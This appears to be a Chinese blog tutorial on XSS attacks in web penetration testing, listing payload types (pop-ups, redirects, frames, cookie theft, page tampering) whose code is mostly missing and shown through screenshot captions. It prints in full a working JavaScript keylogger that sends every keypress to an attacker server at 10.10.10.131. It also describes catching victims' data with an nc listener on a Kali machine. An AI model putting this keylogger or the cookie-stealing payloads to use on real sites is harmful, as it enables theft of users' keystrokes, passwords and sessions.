web 渗透 --- XSS

1.POC

-     #弹窗
- type  #创建连接,点击弹窗
-    #错误弹窗
-      #重定向
-   #框架
-   #获取cookie
-    #篡改页面

 2.漏洞测试

1.弹窗

web 渗透 --- XSS_第1张图片

 2.创建链接

type

web 渗透 --- XSS_第2张图片

3. 错误弹窗

web 渗透 --- XSS_第3张图片

 4.重定向

5.框架

在 kali 监听 80 端口,被攻击者的信息会被收集

输入

web 渗透 --- XSS_第4张图片

6.提取cookie

web 渗透 --- XSS_第5张图片

7.篡改页面

web 渗透 --- XSS_第6张图片

3.攻击方法

1.重定向到其他的地方(肉鸡)读取脚本文件

kali 编写 a.js

web 渗透 --- XSS_第7张图片

kali 使用 nc 侦听 88 端口

输入

web 渗透 --- XSS_第8张图片

 

4.键盘记录器

1.键盘记录器脚本:Keylogger.js

# Keylogger.js
document.onkeypress = function(evt) 
{
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) 
    {
        var http = new XMLHttpRequest();
        var param = encodeURI(key)
        http.open("POST","http://10.10.10.131/keylogger.php",true); # keylogger.php:接收键盘记录器信息的脚本
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}

2.接收键盘记录器信息的脚本:keylogger.php

3.创建存放数据的文件keylog.txt

web 渗透 --- XSS_第9张图片

 4.访问服务器提交代码

5.被攻击者使用键盘随意敲打键盘

web 渗透 --- XSS_第10张图片

6.查看keylog.txt 键盘记录

 

 

你可能感兴趣的:(web,渗透)